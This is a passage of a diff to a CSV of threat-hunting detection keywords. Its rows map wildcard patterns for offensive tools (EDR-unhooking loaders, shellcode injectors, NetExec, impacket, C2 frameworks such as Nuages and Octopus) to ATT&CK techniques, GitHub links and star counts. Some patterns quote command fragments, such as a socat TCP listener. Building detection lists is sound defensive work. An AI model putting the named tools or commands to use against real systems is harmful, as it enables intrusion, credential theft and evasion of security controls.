Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" "*/ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*/NTDLLReflection.git*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*/NtdllUnpatcher.git*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" -"*/ntds_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for 
working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ntds_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/NTLMRecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/NTLMRecon.git*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" 
@@ -4541,45 +4579,50 @@ "*/ntlmrelayx/*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*/ntlmscan.git*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*/ntlmscan/*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" -"*/ntlmtransport.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ntlmtransport.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/ntlmv1.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ntp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ntp-monlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/NtQuerySystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" -"*/NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*/NtRemoteLoad.git*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*/NtRights/*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/NtSetSystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/NtQuerySystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRemoteLoad.git*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRights/*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NtSetSystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*/nuagesAPI.js*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*/nxc --help*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*/nysm bash*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm -dr socat TCP4-LISTEN*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm -r ssh *@*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm.bpf.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*/nysm.git*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nxc --help*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc-ubuntu-latest*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nysm bash*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -dr socat TCP4-LISTEN*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -r ssh *@*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.bpf.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.git*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" "*/o365recon*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*/oab-parse/mspack.*.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*/obfs3/obfs3.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/obfuscated_scripts/*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/obfs3/obfs3.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/obfuscated_scripts/*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/obfuscator/obfuscator.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/octopus.asm*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/Octopus.git*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/octopusx64.asm*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" -"*/OffensiveCSharp.git*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/OffensiveCSharp/*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveCSharp.git*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 
+"*/OffensiveCSharp/*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/OffensiveNotion.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/agent*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/osxcross/target/bin*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/utils*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OG-Sadpanda/*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*/Oh365UserFinder*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value 